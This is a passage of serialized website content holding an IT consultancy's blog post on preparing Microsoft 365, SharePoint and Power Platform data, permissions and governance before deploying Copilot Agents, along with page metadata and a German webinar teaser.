Erfahrung und Best Practices. Wir freuen uns auf eure Kontaktaufnahme!",{"image":10204,"cloudinary":415,"alt":9758,"name":9758,"detailsHeader":10135,"details":26606},[26607,26608],{"text":9499,"href":9500,"details":9501,"icon":9502},{"text":9492,"href":10436,"icon":9506},{"ctaText":9508,"cta":26610,"method":407,"action":9511,"fields":26611},{"skin":9510},[26612,26613,26614,26615,26616,26617,26618],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":10143},{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":10145},{"label":9522,"type":9523,"id":9523,"required":415,"requiredMsg":10147},{"label":10149,"type":9527,"id":9528,"required":415,"requiredMsg":9529},{"type":9531,"id":9532,"value":26474},{"type":9531,"id":9535,"value":10153},{"type":9531,"id":9538},[26620,26622],{"lang":2118,"href":26621},"/en/posts/2025-08-27-azure-monitor",{"lang":9114,"href":26623},"/es/posts/2025-08-27-azure-monitor",{"noMargin":415},{"slick":415},"/posts/2025-08-27-azure-monitor",{"title":26493,"description":402},"posts/2025-08-27-azure-monitor",[26489,8402,11244],"t2dfF2nonYX8Gn3apQAeuDUBGjzU_XmxNy3KX1jg69I",{"id":26632,"title":26633,"author":26634,"body":26635,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":27313,"moment":3,"navigation":415,"path":27385,"seo":27386,"stem":27387,"tags":27388,"webcast":406,"__hash__":27392},"content_de/posts/2025-08-28-agent-ready-infrastructure.md","This is why you need a solid infrastructure to be agent-ready in 2025",[255],{"type":350,"value":26636,"toc":27275},[26637,26639,26641,26647,26654,26658,26660,26663,26666,26671,26681,26688,26693,26702,26712,26725,26729,26731,26734,26738,26740,26743,26747,26749,26756,26760,26762,26773,26780,26782,26785,26805,26809,26811,26814,26818,26820,26827,26831,26833,26836,26840,26842,26853,26857,26859,26862,26866,26868,26871,26876,26890,26893,26896,26900,26902,26906,26908,26915,26918,26926,26934,26938,26940,26943,26949,26952,26957,26962,26966,26968,26975,26979,26981,26988,26996,27000,27002,27005,27008,27012,27014,27017,27020,27027,27031,27033,27036,27039,27044,27047,27050,27054,27056,27062,27065,27071,27074,27079,27083,27085,27144,27148,27150,27172,27176,27178,27181,27185,27187,27190,27194,27196,27203,27207,27209,27220,27227,27232,27235,27239,27241,27247,27254,27257,27260,27263,27267,27269,27272],[2548,26638,13831],{"id":13830},[353,26640,9352],{},[353,26642,26643,26644,456],{},"With this omnipresence, many ideas and the desire to take action or at least experiment arise. At glueckkanja AG, we support our customers throughout this process. Of course, we are already developing and building agents, but in 80% of our projects, the primary focus is on preparing the data and tenant for agent creation. Before you implement Copilot productively in your organization, it's worthwhile to take a critical look at your infrastructure. When making decisions in this area, there are several important aspects to understand before deploying AI agents on a large scale. That’s why, in this blog post, I will guide you through the essential steps and differences. In a time when AI assistants like Microsoft 365 Copilot Agents promise to transform the working world, one principle holds true above all: ",[748,26645,26646],{},"AI is only as good as the system beneath it",[353,26648,26649,26650,26653],{},"This comprehensive guide outlines ",[433,26651,26652],{},"how to prepare your data and infrastructure"," for Copilot Agents, covering key practices in SharePoint, Teams, and the Power Platform.",[2548,26655,26657],{"id":26656},"why-your-infrastructure-data-matters","Why your infrastructure (data) matters",[353,26659,9352],{},[353,26661,26662],{},"As we utilize AI agents, it is imperative to understand that these agents do not inherently possess knowledge about our organization, our data, or our unique operational context. By default, an AI agent only carries the built-in knowledge derived from the training of the Large Language Model (LLM). To effectively enhance and extend the capabilities of these AI agents, it is essential to systematically integrate various components. This enhancement can be achieved through the implementation of System Prompts, Knowledge Bases, Connectors, Web-Search functionalities, access to Microsoft Graph, Semantic Search, and additional tools. These components collectively enable the AI agents to deliver more precise, contextually relevant responses and actions, aligning closely with the specific needs and data of the organization. Since we are now in the very beginning of the agentic area, many of us will start with simple agents that source information based on existing SharePoint Online libraries.",[353,26664,26665],{},"For us in IT, that means we need to take care about our data in SharePoint Online more than ever!",[2179,26667,26668],{},[353,26669,26670],{},"SharePoint Online = Knowledge = Data and Data = Key",[353,26672,26673,26676,26677,26680],{},[433,26674,26675],{},"My clear message:"," Before adding AI copilots to your organization, ",[433,26678,26679],{},"get your data house in order",". The same data that feeds your Copilot Agents also feeds Microsoft 365 Copilot itself.",[353,26682,26683,26684,26687],{},"And not only that! Microsoft 365 Copilot is assessing the same data. *If that data is cluttered, overshared, or poorly secured, the AI could surface incorrect or sensitive information unexpectedly *or example, imagine asking Copilot about company structure and receiving details of a confidential reorganization plan you weren’t meant to see. Such incidents occur when content is ",[433,26685,26686],{},"overshared"," (available too broadly) on platforms like SharePoint or Teams. Note: Copilot respects all existing permissions, that means something like only can happen when permissions are misconfigured. Conversely, if data is siloed or inaccessible, AI assistants will be less useful.",[2179,26689,26690],{},[353,26691,26692],{},"Copilot only surfaces organizational data that the individual user has at least view permissions for!",[353,26694,26695,1501,26698],{},[433,26696,26697],{},"Source:",[374,26699,26700],{"href":26700,"rel":26701},"https://learn.microsoft.com/en-gb/copilot/microsoft-365/microsoft-365-copilot-privacy?azure-portal=true",[378],[353,26703,26704,26707,26708,26711],{},[433,26705,26706],{},"Key takeaway:"," Enterprise AI succeeds only with a solid data foundation. A recent Microsoft report identifies ",[433,26709,26710],{},"data oversharing, data leakage, and noncompliant usage"," as top challenges to address before deploying AI. Organizations that invest in preparation of SharePoint Online and other data sources, will unlock Copilot’s benefits with confidence, while those who don’t risk security breaches or irrelevant AI outputs. Studies show about one-third of decision-makers lack full visibility into critical data.",[9357,26713,8923,26714,8923,26717,8923,26719,8923,26722],{},[9360,26715],{"media":9362,"srcSet":26716},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/data-security-report-statistics.png",[9360,26718],{"media":9366,"srcSet":26716},[9360,26720],{"media":9370,"srcSet":26721},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/data-security-report-statistics-mob.png",[356,26723],{"src":26721,"alt":26724},"Two statistics on data risks: 30% of decision-makers lack visibility into business-critical data (Visibility Gap) and 87% of security leaders reported a data breach in the past year (Data Breach Prevalence).",[2548,26726,26728],{"id":26727},"_10-steps-to-improve-your-m365-data-infrastructure-now","10 steps to improve your M365 data infrastructure now",[353,26730,9352],{},[353,26732,26733],{},"Now we know your agents will need data. As we as glueckkanja step in these projects, this is our typical 10-point list that we work from the top to end with our customers.",[629,26735,26737],{"id":26736},"step-1-check-core-sharing-settings","Step 1: Check Core Sharing Settings",[353,26739,10713],{},[353,26741,26742],{},"Verify tenant-wide settings that could lead to oversharing. For example, scrutinize default link sharing policies (e.g. if “Anyone with the link” or “People in your organization” is allowed by default for SharePoint/OneDrive), whether users can create public Teams by default, and if your Power Platform environment is open without governance. Misconfigured defaults here are a common cause of unintentional broad access..",[629,26744,26746],{"id":26745},"step-2-audit-public-teams","Step 2: Audit Public Teams",[353,26748,10713],{},[353,26750,26751,26752,26755],{},"Review any Microsoft Teams marked as “Public.” A public Team means ",[748,26753,26754],{},"anyone in your organization"," can discover and access its content. Ensure that any Team set to public truly contains only non-sensitive, broadly suitable content. If not, switch it to private or adjust membership. (It’s easy for a Team to be created as Public and later forgotten, exposing files to all employees.)",[629,26757,26759],{"id":26758},"step-3-review-graph-connectors","Step 3: Review Graph Connectors",[353,26761,10713],{},[353,26763,26764,26765,26768,26769,26772],{},"Check if your tenant has any ",[748,26766,26767],{},"Microsoft Graph Connectors"," set up that pull in third-party data (e.g. from external file systems, wikis, etc.). Remove or secure any connector that indexes data not everyone should see. ",[433,26770,26771],{},"Why?"," Content indexed via Graph Connectors becomes part of your Microsoft Graph search index – meaning Copilot can potentially use it to answer prompts. You only want relevant, intended data sources connected.",[629,26774,26776,26777],{"id":26775},"step-4-generate-a-sharepoint-online-baseline-report","Step 4: Generate a ",[433,26778,26779],{},"SharePoint Online Baseline Report",[353,26781,10713],{},[353,26783,26784],{},"SPO has different possible risks for unwanted data in Agents and Copilot. You need to look for different key metrics:",[367,26786,26787,26790,26793,26796,26799,26802],{},[370,26788,26789],{},"Broken Permission Inheritance on a folder-level",[370,26791,26792],{},"Public SharePoint Sites",[370,26794,26795],{},"Use of \"Everyone Except External Users\" or other dynamic group that contain all users",[370,26797,26798],{},"Anyone Sharing Links",[370,26800,26801],{},"Everyone-in-my-org Sharing Links",[370,26803,26804],{},"Unwanted people in the Site Admins / Owners / Members / Visitors Group",[629,26806,26808],{"id":26807},"step-5-categorize-and-prioritize-risks","Step 5: Categorize and Prioritize Risks",[353,26810,10713],{},[353,26812,26813],{},"Take the findings from Steps 1–4 and rank them by severity. Which sites or files carry the most business-critical or sensitive data and also have exposure risks? Prioritize fixing those. By layering business context (e.g., a site with financial data vs. a site with generic templates), you can focus on the most impactful issues first.",[629,26815,26817],{"id":26816},"step-6-involve-site-owners-for-access-reviews","Step 6: Involve Site Owners for Access Reviews",[353,26819,10713],{},[353,26821,26822,26823,26826],{},"For each SharePoint site (or Team) highlighted as risky, have the site owner double-check who has access and if that is appropriate. Owners are typically closest to the content and can quickly spot “Oh, why does ",[748,26824,26825],{},"Everyone"," have read access to this? That shouldn’t be.” Implement a process where site admins certify permissions regularly.",[629,26828,26830],{"id":26829},"step-7-establish-ongoing-oversight","Step 7: Establish Ongoing Oversight",[353,26832,10713],{},[353,26834,26835],{},"Put in place a continuous monitoring process for new oversharing issues. Oversharing control isn’t a one-time fix; as new sites, Teams, and files get created, you need to catch misconfigurations proactively. Consider using Microsoft Purview’s reports or alerts to catch things like files shared externally or to huge groups, new public teams created, etc. Microsoft’s tools can automate alerts for these conditions, so make use of them to maintain a strong posture.",[629,26837,26839],{"id":26838},"step-8-apply-sensitivity-labels-and-dlp-policies","Step 8: Apply Sensitivity Labels and DLP Policies",[353,26841,10713],{},[353,26843,26844,26845,26848,26849,26852],{},"Use Microsoft Purview ",[433,26846,26847],{},"Sensitivity Labels"," to classify data (Confidential, Highly Confidential, etc.) and bind those labels to protection settings. For instance, a “Confidential” label can encrypt files or prevent external sharing. Also configure ",[433,26850,26851],{},"Data Loss Prevention (DLP)"," policies to prevent or monitor oversharing of sensitive info (like blocking someone from emailing a list of customer SSNs). These tools not only prevent accidental leaks in day-to-day use, they also work with Copilot: if Copilot tries to access or output labeled content in ways it shouldn’t, DLP can intervene. Moreover, Copilot itself will carry forward the document’s label to its responses, as noted later.",[629,26854,26856],{"id":26855},"step-9-implement-power-platform-governance","Step 9: Implement Power Platform Governance",[353,26858,10713],{},[353,26860,26861],{},"Extend your oversight to the Power Platform (Power Apps, Power Automate, etc.). Define DLP policies for Power Platform to control connectors (so someone can’t, say, make a flow that pulls data from a sensitive SharePoint list and posts it to an external service). Also consider having multiple environments (Dev/Test/Prod) with proper security so that “Citizen Developers” building agents or apps don’t inadvertently expose data. Essentially, prevent the Power Platform from becoming an ungoverned backdoor to your data.",[629,26863,26865],{"id":26864},"step-10-educate-and-enable-your-agent-builders","Step 10: Educate and Enable Your Agent Builders",[353,26867,10713],{},[353,26869,26870],{},"Finally, create guidelines and best practices for those who will be building or deploying AI agents (whether they are pro developers or business users). Establish training on handling data safely: e.g., how to choose appropriate knowledge sources for an agent, why not to include sensitive files in a broadly shared agent, how to test an agent’s output for any unexpected info. By fostering a data-aware culture among “agent makers,” you reduce the chance of someone inadvertently exposing information when designing an AI solution.",[353,26872,26873],{},[433,26874,26875],{},"Sources:",[367,26877,26878,26884],{},[370,26879,26880],{},[374,26881,26882],{"href":26882,"rel":26883},"https://techcommunity.microsoft.com/blog/microsoft365copilotblog/from-oversharing-to-optimization-deploying-microsoft-365-copilot-with-confidence/4357963",[378],[370,26885,26886],{},[374,26887,26888],{"href":26888,"rel":26889},"https://techcommunity.microsoft.com/blog/microsoft365copilotblog/microsoft-graph-connectors-update-expand-copilot%E2%80%99s-knowledge-with-50-million-ite/4243648",[378],[353,26891,26892],{},"After you have completed these steps, you can now securely go on and start building productive agents. To build agents, we have different platforms and features from Microsoft that we can rely on for. You'll find the most prominent examples in the next chapter. If you need help with this list, feel free to reach out to us so we can help you with this important preparation exercise.",[353,26894,26895],{},"Nothing prevents you in the meanwhile to create PoC or Test-Agents with sample data, manually uploaded files or specific data attached via RAG. But we recommend these steps before a larger implementation / rollout of agents.",[2548,26897,26899],{"id":26898},"understanding-differences-between-agent-platforms","Understanding differences between Agent Platforms",[353,26901,9352],{},[629,26903,26905],{"id":26904},"step-1-understand-your-agent-creators","Step 1: Understand your Agent-Creators",[353,26907,10713],{},[353,26909,26910,26911,26914],{},"After the foundation work to prepare the data, we need to understand which platforms are available to create those agents. We try to differentiate these tools by features and possibilities, but it's important to notice that creating agents and choosing the right tolling is a range. There are multiple ways to build AI agents in the Microsoft ecosystem. It’s important to pick the right one for your needs and your team’s skill level. It also clarifies when to leverage ",[433,26912,26913],{},"Azure AI Foundry"," versus built-in Copilot Studio tools.",[353,26916,26917],{},"Microsoft offers a set of different tools that can build agents by today. While they seem like each other, they are built for different target audiences and levels of expertise. Take a closer look at the overview below. Understanding who needs to create and maintain these agents, also shows us, which Knowledge sources (= data) we need to prepare for our Agents. Beside the tools in the list below, there are even more pro-code solutions to build agents like M365 Agents Toolkit, Visual Studio Code, Agent SDK and more.  All our data preparation  steps´ apply for them as well, since they access the same data like other agents do.",[353,26919,26920,1501,26922],{},[433,26921,26697],{},[374,26923,26924],{"href":26924,"rel":26925},"https://www.egroup-us.com/news/microsoft-copilot-ai-integration/",[378],[9357,26927,8923,26928,8923,26931],{},[9360,26929],{"media":9362,"srcSet":26930},"https://res.cloudinary.com/c4a8/image/upload/v1756363984/blog/pics/table-copilot-ai-integration.png",[356,26932],{"src":26930,"alt":26933},"Comparison of three Copilot solution categories: Pre-Built (ootb), Makers, and Developers.",[629,26935,26937],{"id":26936},"step-2-identify-use-cases-and-requirements-for-your-platform","Step 2: Identify Use Cases and requirements for your platform",[353,26939,10713],{},[353,26941,26942],{},"As you can probably think of, not every platform supports every use case. Agents can be used for simple tasks, like answering questions based on existing knowledge or complex, like automatically generating answers or executing processes. Also, the final UX where and how we want to access those agents is important to decide for a platform.",[353,26944,26945],{},[356,26946],{"alt":26947,"src":26948},"Diagram showing three levels of agent capabilities from simple to advanced","https://res.cloudinary.com/c4a8/image/upload/blog/pics/agents-differences.png",[353,26950,26951],{},"With these considerations in mind, we usually try to use the easiest solution possible to build our Agent. But also, we need to find the solution that is scalable for further development. But not every Agent needs to built on Agent AI Foundry from the very beginning.",[353,26953,26954],{},[433,26955,26956],{},"Tip:",[2179,26958,26959],{},[353,26960,26961],{},"If you are not sure where to start to build your Agent, you always can use Copilot Studio and either integrate more Data from Azure AI there and publish it to Microsoft 365 Copilot. So get both \"up- and downwards compatibility\".",[2548,26963,26965],{"id":26964},"rag-retrieval-augumented-generation-vs-sharepoint-vs-upload","RAG (Retrieval-Augumented Generation) vs. SharePoint vs. Upload",[353,26967,9352],{},[353,26969,26970,26971,26974],{},"Looking at it the first time, everything seems to be RAG – but there are differences! When you first explore Copilot Agents and its agent capabilities, it’s tempting to assume that all knowledge integration follows the same RAG (Retrieval-Augmented Generation) pattern. While they may all ",[748,26972,26973],{},"look"," like RAG from the outside: retrieving documents and generating answers, the way they work under the hood differs significantly. Understanding these differences is essential for choosing the right approach based on your goals, scale, and technical readiness. Here is a short explanation and overview",[629,26976,26978],{"id":26977},"manual-file-uploads","Manual File Uploads",[353,26980,10713],{},[353,26982,26983,26984,26987],{},"Manual upload is the simplest way to add knowledge to a Copilot agent. You drag and drop documents directly into the Copilot Studio interface. Microsoft automatically indexes these files and retrieves relevant content during a user query. This is ideal for small pilots and early testing. ",[433,26985,26986],{},"Also, be aware that the content of the files should be accessible to everyone with access to agent",". There is not Permission-Management here that you need to take care of. On the other hand, you will need to manually update these files in the long term if things change. Currently for Copilot Agents you can add up to 20 files manually.",[353,26989,26990,26991],{},"Source: ",[374,26992,26995],{"href":26993,"rel":26994},"https://learn.microsoft.com/en-us/microsoft-365-copilot/extensibility/copilot-studio-agent-builder-knowledge",[378],"https://learn.microsoft.com/en-us/microsoft-365-copilot/extensibility/copilot-studio-agent-builder-knowledge#file-size-limits",[629,26997,26999],{"id":26998},"sharepoint-online","SharePoint Online",[353,27001,10713],{},[353,27003,27004],{},"This method uses Microsoft’s Retrieval API to access content directly from SharePoint Online connected via Graph Connector. The agent retrieves the most relevant content live at query time, respecting existing Microsoft 365 permissions. Content can be SharePoint sites, document libraries, folders or files. It’s dynamic, secure, and well-suited for scaling across departments or business units without managing your own infrastructure. Building up on the existing infrastructure, we are using the built-in security model from SharePoint with is a huge benefit compared to other knowledge options. Departments can easily update the files and that will be reflected within the agent. That means if two users with different access levels ask the agent, one might get an answer from a certain file while another user (without access) would not – which is exactly the behavior we want.",[353,27006,27007],{},"Note: SharePoint Lists are currently a not supported knowledge-type, so you can not index them out of the box (Q3 2025)",[629,27009,27011],{"id":27010},"custom-rag-self-managed","Custom RAG (Self-Managed)",[353,27013,10713],{},[353,27015,27016],{},"In a classic RAG setup, you build and manage the entire retrieval pipeline yourself. That includes document preprocessing, chunking, embedding, storing in a vector database, and retrieving the top matches at query time. This gives you full control over how content is processed and retrieved, but it also brings complexity and maintenance overhead. It’s best suited for advanced use cases that require customization beyond what Microsoft’s managed services offer. This is not an in-built feature in Copilot or Copilot Studio; we would do this in Microsoft Azure.",[353,27018,27019],{},"A example when to use RAG could be for instance, If you needed to integrate an AI agent with a proprietary database or thousands of PDFs stored outside of Microsoft 365, and apply custom filters, a self-managed RAG might be necessary – but this requires significant effort.",[353,27021,27022,27023],{},"source: ",[374,27024,27025],{"href":27025,"rel":27026},"https://learn.microsoft.com/en-us/azure/search/retrieval-augmented-generation-overview?tabs=docs",[378],[629,27028,27030],{"id":27029},"what-to-choose-and-when","What to Choose and When",[353,27032,10713],{},[353,27034,27035],{},"While all three approaches involve retrieving content to support language generation, only the custom self-managed solution qualifies as “true RAG” in the technical sense. For most organizations starting out, manual uploads or SharePoint connections are significantly easier and faster to implement. They provide strong results with minimal setup - and they let teams focus on use case design and adoption, rather than infrastructure.",[353,27037,27038],{},"A general advice from my side in this point:",[2179,27040,27041],{},[353,27042,27043],{},"Try to build the agents as close to your data as possible",[353,27045,27046],{},"Example: If your data is stored in large SQL databases or external CRM systems, a SharePoint Agent will not do the job. If we have all our knowledge in SharePoint, SharePoint Agents or Copilot Agents might be a good start.",[353,27048,27049],{},"Custom RAG should be considered only when your needs go beyond what the managed options can provide, not as the default starting point. A manual upload is great for the first pilot or for small pilots with limited and specific knowledge that is not often updated. In many scenarios we would just use a SharePoint library or site with the agent. Because of this, we are focusing on a scenario looking like that:",[2548,27051,27053],{"id":27052},"microsoft-365-copilot-copilot-agents-security-compliance-out-of-the-box","Microsoft 365 Copilot & Copilot Agents: Security & Compliance out of the box",[353,27055,9352],{},[353,27057,27058,27061],{},[433,27059,27060],{},"Secure cloud infrastructure"," is the bedrock for enterprise AI. Microsoft provides the most secure framework possible for our Agents by putting them in context of Microsoft 365 Copilot. Every organization can trust their existing Security Framework based on Conditional Access and Multi-Factor authentication for access and their existing Governance Framework based on Microsoft Purview.",[353,27063,27064],{},"Agents that are used in M365 Copilot or published from Copilot Studio as a Teams Chatbot are only accessible within our tenant boundaries. That means we get the same level of security for these applications that we already have.",[353,27066,27067],{},[356,27068],{"alt":27069,"src":27070},"Diagram showing how Microsoft 365 Copilot accesses user data within Microsoft 365.","https://res.cloudinary.com/c4a8/image/upload/blog/pics/copilot-security.png",[353,27072,27073],{},"In addition to that, Microsoft offers several technical and organization commitments gathered as we call it \"Enterprise Grade Data Protection\".",[353,27075,26990,27076],{},[374,27077,26700],{"href":26700,"rel":27078},[378],[629,27080,27082],{"id":27081},"microsoft-365-copilot-enterprise-data-protection-edp-for-prompts-and-responses","Microsoft 365 Copilot: Enterprise Data Protection (EDP) for Prompts and Responses",[353,27084,10713],{},[367,27086,27087,27106,27112,27132,27138],{},[370,27088,27089,27092,27093,13854,27096,27099,27100,13854,27103,456],{},[433,27090,27091],{},"Contractual Protection",": Prompts (user input) and responses (Copilot output) are protected under the ",[433,27094,27095],{},"Data Protection Addendum (DPA)",[433,27097,27098],{},"Product Terms",". These protections are the same as those applied to ",[433,27101,27102],{},"emails in Exchange",[433,27104,27105],{},"files in SharePoint",[370,27107,27108,27111],{},[433,27109,27110],{},"Data Security:"," Encryption at rest and in transit, Physical security controls, Tenant-level data isolation",[370,27113,27114,27117,27118,27121,27122,2454,27125,2454,27128,27131],{},[433,27115,27116],{},"Privacy Commitments"," Microsoft acts as a ",[433,27119,27120],{},"data processor",", using data only as instructed by the customer. Supports ",[433,27123,27124],{},"GDPR",[433,27126,27127],{},"EU Data Boundary",[433,27129,27130],{},"ISO/IEC 27018",", and more.",[370,27133,27134,27137],{},[433,27135,27136],{},"Access Control & Policy Inheritance",": Copilot respects: Identity models and permissions, Sensitivity labels, Retention policies, Audit settings, Admin configurations, AI & Copyright Risk Mitigation and Protection against: Prompt injection, Harmful content, Copyright issues (via protected material detection and Customer Copyright Commitment)",[370,27139,27140,27143],{},[433,27141,27142],{},"No Model Training:"," Prompts, responses, and Microsoft Graph data are NOT used to train foundation models.",[629,27145,27147],{"id":27146},"copilot-agents-with-sharepoint-online-knowledge","Copilot Agent's with SharePoint Online-Knowledge:",[353,27149,10713],{},[367,27151,27152,27162],{},[370,27153,27154,27157,27158,27161],{},[433,27155,27156],{},"Permission & Sharing Model:"," Agents with SharePoint Online access always respects the permissions of the associated SharePoint site. That means, ",[433,27159,27160],{},"on one hand, you need to ensure that everyone who should have access has at least read permissions on the site","; on the other hand, you must be vigilant about not granting unnecessary permissions that could expose sensitive information to unauthorized users**. Properly configuring permissions is essentia**l, as Copilot Agents will only be able to access and surface content that the querying user is permitted to see. Additionally, leveraging Microsoft Purview information protection ensures that sensitivity labels and data loss prevention (DLP) policies persist with the content",[370,27163,27164,27167,27168,27171],{},[433,27165,27166],{},"Persistent Labels & DLP:"," Enable ",[433,27169,27170],{},"Microsoft Purview"," information protection so that sensitivity labels persist with content. Copilot agents inherit labels on source documents. Meaning if a file is classified “Confidential,” any AI-generated content or document from now on, will carry that label forward. This persistent label inheritance works in tandem with Data Loss Prevention policies to prevent AI from inadvertently exposing protected data. In practice, that means even if Copilot summarizes a sensitive file, the summary will be handled as sensitive too. This is something outstanding we do not find outside of Microsoft 365 and we won't see any AI Agent that is able to deeply integrate like this in the Microsoft 365 ecosystem!",[2548,27173,27175],{"id":27174},"best-practices-to-prepare-further-sharepoint-online-for-agent-use","Best Practices to prepare further SharePoint Online for Agent use",[353,27177,9352],{},[353,27179,27180],{},"To prepare SharePoint Online for effective use with Copilot Agents, follow these best practices:",[629,27182,27184],{"id":27183},"dedicated-sharepoint-site","Dedicated SharePoint Site",[353,27186,10713],{},[353,27188,27189],{},"First, create a dedicated SharePoint site or a specific folder designed exclusively for your Copilot Agent’s knowledge base. This approach helps minimize issues related to oversharing and reduces the risk of users accidentally uploading sensitive or irrelevant files to the agent’s accessible repository. If you decide to use an existing SharePoint site, carefully review its contents to ensure that no confidential or sensitive information is stored there that should not be discoverable by the agent.",[629,27191,27193],{"id":27192},"granting-access","Granting Access",[353,27195,10713],{},[353,27197,27198,27199,27202],{},"It is also important to ensure that all intended users have the necessary read permissions to access the site or folder. If you need to grant access manually, Ensure all intended users have read access to the site (for example, by ",[433,27200,27201],{},"adding them to the SharePoint site’s Visitors group"," or an appropriate Azure AD security group) to simplify the process and prevent accidental permission misconfigurations.",[629,27204,27206],{"id":27205},"prepare-files","Prepare Files",[353,27208,10713],{},[353,27210,27211,27212,27215,27216,27219],{},"When preparing documents for use with Copilot Agents, remember that the AI currently ",[433,27213,27214],{},"cannot interpret embedded images within"," files. ",[433,27217,27218],{},"Therefore, add descriptive image captions or alternative text"," to help ensure that important visual information is not lost. For text-heavy documents, make sure When summarizing or referencing content, keep the total to a maximum of 1.5 million words or 300 pages to ensure Copilot works effectively.",[353,27221,27222,27223,27226],{},"For ",[433,27224,27225],{},"Excel files",", organize your data so that each file focuses either on numbers or on text, as mixed-content tables tend to yield less accurate results. Agents also respond most reliably to queries when the relevant data is contained within a single sheet of the workbook.",[353,27228,27229],{},[748,27230,27231],{},"Agents respond best to Excel data when it’s contained in one sheet.",[353,27233,27234],{},"Example: If you have a large customer feedback survey stored in a single Excel file, separate the quantitative data (such as ratings and numerical responses) from the qualitative data (such as free-text feedback) into two different sheets. This method allows you to use tools like Python and Excel formulas to efficiently analyze the numerical data (e.g., calculate averages, sort results, determine confidence levels), while leveraging M365 Copilot’s sentiment analysis features to gain insights from the text-based feedback.",[629,27236,27238],{"id":27237},"file-limitations","File Limitations",[353,27240,10713],{},[353,27242,27243,27244],{},"Finally, be aware of the file types and size limitations supported by Copilot Agents and Copilot Studio. The following table outlines current support:",[374,27245,26995],{"href":26993,"rel":27246},[378],[353,27248,27249,27250],{},"Also acknowledge those best practices Microsoft has shared on document lengths: ",[374,27251,27252],{"href":27252,"rel":27253},"https://support.microsoft.com/en-gb/topic/keep-it-short-and-sweet-a-guide-on-the-length-of-documents-that-you-provide-to-copilot-66de2ffd-deb2-4f0c-8984-098316104389",[378],[7389,27255],{":head":7391,":hide-container":7391,":table":27256},"fileLimitations",[353,27258,27259],{},"Currently unsupported Filetypes in SharePoint Online: Officially everything else that is not listed there, is not officially supported.",[353,27261,27262],{},"Certain file types, such as CSV files, may function adequately even though they are not officially supported because they closely resemble plain text formats. However, most other file types—particularly container files like CAB, EXE, ZIP, as well as image, video, and audio formats such as PNG, IMG, MP3, and MP4—are not supported at this time.",[2548,27264,27266],{"id":27265},"final-thoughts","Final thoughts",[353,27268,9352],{},[353,27270,27271],{},"By following these recommendations, you can ensure that your Copilot Agents have access to well-structured, secure, and high-quality data, maximizing their usefulness and minimizing the risk of accidental data exposure. Investing time in preparing your SharePoint environment sets a strong foundation for successful AI agent deployment and adoption within your organization.",[353,27273,27274],{},"In fact many of our \"Build-an-Agent\" projects starting exactly with that. Not building the agent, but preparing the infrastructure and knowledge that we have a good quality data to use for the AI, because the Agent is only as good as the system beneath it!",{"title":402,"searchDepth":403,"depth":403,"links":27276},[27277,27278,27279,27292,27296,27302,27306,27312],{"id":13830,"depth":403,"text":13831},{"id":26656,"depth":403,"text":26657},{"id":26727,"depth":403,"text":26728,"children":27280},[27281,27282,27283,27284,27286,27287,27288,27289,27290,27291],{"id":26736,"depth":704,"text":26737},{"id":26745,"depth":704,"text":26746},{"id":26758,"depth":704,"text":26759},{"id":26775,"depth":704,"text":27285},"Step 4: Generate a SharePoint Online Baseline Report",{"id":26807,"depth":704,"text":26808},{"id":26816,"depth":704,"text":26817},{"id":26829,"depth":704,"text":26830},{"id":26838,"depth":704,"text":26839},{"id":26855,"depth":704,"text":26856},{"id":26864,"depth":704,"text":26865},{"id":26898,"depth":403,"text":26899,"children":27293},[27294,27295],{"id":26904,"depth":704,"text":26905},{"id":26936,"depth":704,"text":26937},{"id":26964,"depth":403,"text":26965,"children":27297},[27298,27299,27300,27301],{"id":26977,"depth":704,"text":26978},{"id":26998,"depth":704,"text":26999},{"id":27010,"depth":704,"text":27011},{"id":27029,"depth":704,"text":27030},{"id":27052,"depth":403,"text":27053,"children":27303},[27304,27305],{"id":27081,"depth":704,"text":27082},{"id":27146,"depth":704,"text":27147},{"id":27174,"depth":403,"text":27175,"children":27307},[27308,27309,27310,27311],{"id":27183,"depth":704,"text":27184},{"id":27192,"depth":704,"text":27193},{"id":27205,"depth":704,"text":27206},{"id":27237,"depth":704,"text":27238},{"id":27265,"depth":403,"text":27266},{"lang":2183,"seoTitle":27314,"titleClass":7896,"date":27315,"categories":27316,"blogtitlepic":27317,"socialimg":27318,"customExcerpt":27319,"keywords":27320,"maxContent":415,"fileLimitations":27321,"textImageTeaser":27347,"asideNav":27358,"hreflang":27378,"footer":27383,"scripts":27384,"published":415},"How to Prepare Your M365 Data for Copilot Agents","2025-08-28",[534],"head-microsoft-copilot.jpg","/blog/heads/head-microsoft-copilot.jpg","Before Microsoft 365 Copilot Agents can deliver real value, the foundation must be solid: clean data, proper permissions, and a reliable infrastructure. This guide explains why data quality determines AI success, highlights risks like oversharing and silos, and outlines 10 practical steps to make your M365 environment agent-ready—secure, compliant, and scalable.","Microsoft 365 Copilot, Copilot Agents, M365 data governance, AI readiness, SharePoint data security, M365 infrastructure, oversharing prevention, AI data preparation, Microsoft 365 security, agent-ready M365",[27322,27326,27330,27333,27336,27338,27340,27342,27343,27345],[27323,27324,27325],"File type","SharePoint Online - Limit","Manual Upload - Limit",[27327,27328,27329],".doc","150 MB","100 MB",[27331,27332,27329],".docx","512 MB",[27334,27328,27335],".html","not supported",[27337,27332,27329],".pdf",[27339,27328,27329],".ppt",[27341,27332,27329],".pptx",[20904,27328,27329],[27344,27328,27329],".xls",[27346,27328,27329],".xlsx",{"image":27348,"cloudinary":415,"alt":27349,"bgColor":27350,"offset":415,"white":415,"list":27351,"left":406,"float":406,"firstColWidth":13492,"secondColWidth":13493,"copyClasses":13494,"headline":27355,"subline":27356,"spacing":27357},"/icons/icon-copilot.svg"," Agent-Ready Infrastructure – Deine Basis für produktive Copilot Agents","#543b9c",[27352],{"ctaText":27353,"ctaHref":27354,"ctaType":8004,"external":415},"Sichere dir jetzt deinen Platz – kostenlos!","https://events.teams.microsoft.com/event/53a92e2c-9206-488d-9602-831864212207@a53834b7-42bc-46a3-b004-369735c3acf9","Agent-Ready Infrastructure – Deine Basis für produktive Copilot Agents","\u003Cp>KI ist nur so gut wie die Infrastruktur, auf der sie läuft. Wer Copilot Agents ernsthaft in der Praxis nutzen will, braucht mehr als nur Lizenzierung und Aktivierung. Es geht um strukturierte Daten, konsistente Governance und eine durchdachte Architektur, die skaliert – kurz: eine Agent-Ready Infrastructure.\u003Cbr /> \u003Cbr /> In unserem englischsprachigen Vortrag zeigen wir 